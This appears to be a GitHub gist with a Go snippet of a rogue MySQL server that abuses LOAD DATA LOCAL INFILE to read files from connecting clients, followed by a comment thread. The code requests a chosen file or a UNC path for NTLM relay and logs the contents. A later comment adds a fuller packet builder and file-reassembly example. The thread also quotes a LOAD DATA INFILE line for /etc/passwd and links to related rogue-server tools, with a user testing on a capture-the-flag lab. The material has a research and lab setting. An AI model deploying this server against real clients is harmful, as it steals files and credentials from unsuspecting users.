@bmaia bmaia/mysql_server.go Secret

Last active May 4, 2020
for mysql.Running() {
	// accept the next TCP connection from a client
	conn, err := mysql.listener.AcceptTCP()
	if err != nil {
		log.Warning("Error while accepting TCP connection: %s", err)
		continue
	}
	// send the mysql greeting (the server handshake packet)
	if _, err := conn.Write([]byte(MySQLGreeting)); err != nil {
		log.Warning("Error while sending greeting: %s", err)
		conn.Close()
		continue
	}
	// read the client's handshake response into a single buffer
	b := make([]byte, 16384)
	bufio.NewReader(conn).Read(b)
	// parse client capabilities and validate connection
	// TODO: parse mysql connections properly and
	// display additional connection attributes
	// b[4] and b[5] are the low 16 bits of the capability flags (the 4-byte
	// packet header comes first). The binary string is 16 chars only when
	// bit 15 (CLIENT_SECURE_CONNECTION) is set, as it is for modern clients;
	// index 8 of that string is then bit 7, CLIENT_LOCAL_FILES (0x80).
	clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
	if len(clientCapabilities) == 16 {
		remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
		log.Info("MySQL connection from: %s", remoteAddress)
		loadData := string(clientCapabilities[8])
		log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
		// the username is NUL-terminated at payload offset 32 (36 on the wire)
		username := bytes.Split(b[36:], []byte{0})[0]
		log.Info("MySQL Login Request Username: %s", username)
		// send initial responseOK, then answer the client's first query
		// with a LOCAL INFILE request for mysql.infile and read the file back
		// TODO: include binary support and files > 16kb
		conn.Write([]byte(FirstResponseOK))
		bufio.NewReader(conn).Read(b)
		conn.Write([]byte(GetFile))
		infileLen, err := bufio.NewReader(conn).Read(b)
		if err != nil {
			log.Warning("Error while reading buffer: %s", err)
			conn.Close()
			continue
		}
		// check if the infile is an UNC path
		if strings.HasPrefix(mysql.infile, "\\") {
			log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
		} else if infileLen < 9 {
			// a 4-byte read is a bare zero-length packet: the client sent no data,
			// and slicing b[4:infileLen-4] below would panic
			log.Warning("Unexpected buffer size %d", infileLen)
		} else {
			// print the infile content, ignore mysql protocol headers
			// TODO: include binary support and output to a file
			log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
		}
		// send additional response
		conn.Write([]byte(SecondResponseOK))
		bufio.NewReader(conn).Read(b)
	}
	// close here rather than with defer: a defer inside the accept loop would
	// keep every client descriptor open until the loop returns
	conn.Close()
}
(...)
@guanicoe


guanicoe commented May 4, 2020

Are the (...) on line 55 (end) on purpose?

@bmaia

Owner Author

bmaia commented May 4, 2020

> Are the (...) on line 55 (end) on purpose?

Yes, this is just a code snippet for the blog post here -> https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html

The full source code for the server was merged into Bettercap, you can find it here:

https://github.com/bettercap/bettercap/blob/master/modules/mysql_server/mysql_server.go

@guanicoe


guanicoe commented May 4, 2020

@bmaia I did not expect such a swift response. I did check the code in bettercap and saw it was indeed included. I'm about to test your tool on htb, thanks ;)

@guanicoe


guanicoe commented May 4, 2020

Hey again, I'm having an issue with this tool related to bettercap/bettercap#572. Basically I get [sys.log] [war] mysql.server unpexpected buffer size 4 (I actually also corrected the typo in the main code).
I don't really know what it means nor how to troubleshoot.


FYI:

$mariadb -V
mariadb  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
$mysql -V
mysql  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

Do you think you could help?

@bmaia

Owner Author

bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD DATA, check the MySQL packets and try to replay them (see the snippets below for an example):

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:

https://medium.com/@knownsec404team/mysql-client-arbitrary-file-reading-attack-chain-extension-727bb63f578c
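
As an added worked example (not part of the gist, of bettercap, or of any comment in this thread), the Go code below does explicitly what the snippet at the top of the page does with fixed offsets, and is also the kind of decoder you want when you capture a real client's packets and replay them as suggested above: it splits a raw byte stream into MySQL packets, decodes the client's Handshake Response 41 payload into capability flags and username, tests CLIENT_LOCAL_FILES (0x80, the same bit the snippet reads as clientCapabilities[8]), builds the 0xFB LOCAL INFILE request and the OK packet the server sends, and reassembles the file the client streams back across any number of packets until the zero-length terminator, which is what the "files > 16kb" TODO needs. The login packet and the file reply are constructed inline for the demo, not captured from a real client; sampleLogin, sampleFileReply, nextPacket, ReassembleFile and the other names are this example's own.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// CLIENT_LOCAL_FILES: the client must set this capability bit in its Handshake
// Response for LOAD DATA LOCAL INFILE to work (bit 7 of the low 16 bits).
const clientLocalFiles uint32 = 0x00000080

// Handshake Response 41 payload: 4 bytes capability flags, 4 bytes max packet
// size, 1 byte charset, 23 reserved bytes, then the NUL-terminated username.
// Payload offset 32 is wire offset 36 once the 4-byte packet header is counted.
const userOffset = 4 + 4 + 1 + 23

// nextPacket pops one MySQL packet off a raw byte stream. The header is a
// 3-byte little-endian payload length followed by a 1-byte sequence id.
func nextPacket(stream []byte) (payload, rest []byte, ok bool) {
	if len(stream) < 4 {
		return nil, stream, false
	}
	n := int(stream[0]) | int(stream[1])<<8 | int(stream[2])<<16
	if len(stream) < 4+n {
		return nil, stream, false // incomplete packet, need more bytes
	}
	return stream[4 : 4+n], stream[4+n:], true
}

// packet prepends the MySQL packet header to a payload.
func packet(seq byte, payload []byte) []byte {
	n := len(payload)
	return append([]byte{byte(n), byte(n >> 8), byte(n >> 16), seq}, payload...)
}

// ParseHandshakeResponse returns the capability flags and username carried in
// the payload of a client's Handshake Response 41 packet.
func ParseHandshakeResponse(payload []byte) (caps uint32, user string, err error) {
	if len(payload) < userOffset+1 {
		return 0, "", errors.New("handshake response too short")
	}
	caps = binary.LittleEndian.Uint32(payload[0:4])
	rest := payload[userOffset:]
	end := bytes.IndexByte(rest, 0)
	if end < 0 {
		return 0, "", errors.New("username is not NUL-terminated")
	}
	return caps, string(rest[:end]), nil
}

// CanLoadLocal reports whether a client with these flags honours a LOCAL INFILE request.
func CanLoadLocal(caps uint32) bool { return caps&clientLocalFiles != 0 }

// LocalInfileRequest is the server->client packet that asks for a file:
// a 0xFB marker followed by the path, without a NUL terminator.
func LocalInfileRequest(seq byte, path string) []byte {
	return packet(seq, append([]byte{0xFB}, path...))
}

// OKPacket is a minimal OK response: 0x00, affected rows 0, last insert id 0,
// status flags 0x0002 (SERVER_STATUS_AUTOCOMMIT), 0 warnings.
func OKPacket(seq byte) []byte {
	return packet(seq, []byte{0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00})
}

// ReassembleFile collects the file the client streams back after a
// LocalInfileRequest: data packets followed by a zero-length packet (a bare
// 4-byte header) marking end-of-file. done stays false until that terminator
// is seen, so a caller can keep reading from the socket; rest follows it.
func ReassembleFile(stream []byte) (content []byte, done bool, rest []byte) {
	for {
		payload, next, ok := nextPacket(stream)
		if !ok {
			return content, false, stream
		}
		stream = next
		if len(payload) == 0 {
			return content, true, stream
		}
		content = append(content, payload...)
	}
}

// sampleLogin is a constructed (not captured) Handshake Response from a client
// advertising capabilities 0x000AA285 (CLIENT_LOCAL_FILES included), max packet
// size 16 MiB, charset 33 (utf8_general_ci), user "root", empty auth response.
func sampleLogin() []byte {
	p := append([]byte{0x85, 0xA2, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x01, 33}, make([]byte, 23)...)
	return packet(1, append(p, "root\x00\x00"...))
}

// sampleFileReply is a constructed client reply: two data packets carrying a
// fake /etc/passwd line, then the zero-length terminator.
func sampleFileReply() []byte {
	r := append(packet(2, []byte("root:x:0:0:")), packet(3, []byte("root:/root:/bin/bash\n"))...)
	return append(r, packet(4, nil)...)
}

func main() {
	payload, _, _ := nextPacket(sampleLogin())
	caps, user, err := ParseHandshakeResponse(payload)
	fmt.Println("user:", user, "local_files:", CanLoadLocal(caps), "err:", err)
	fmt.Printf("server -> client: % x\n", LocalInfileRequest(1, "/etc/passwd"))
	content, done, _ := ReassembleFile(sampleFileReply())
	fmt.Printf("client -> server: done=%v content=%q\n", done, content)
	fmt.Printf("server -> client: % x\n", OKPacket(5))
}
```

On the wire the end-of-file terminator is a bare 4-byte header with length 0, so a read that returns exactly 4 bytes right after the LOCAL INFILE request means the client sent no data for that path; a server should treat that as "nothing retrieved" rather than index into the buffer the way a fixed `b[4:infileLen-4]` slice does. For real captures, feed the raw TCP payload of each direction to nextPacket and ReassembleFile instead of the constructed bytes.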

@guanicoe


guanicoe commented May 4, 2020

OK, I'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py but it spat a lot of exceptions, and reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated.

#python rogue_mysql_server.py 
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])

@guanicoe


guanicoe commented May 4, 2020

Just to let you know that your module works great, and that I was to blame. The error came from a malformed SQL query.
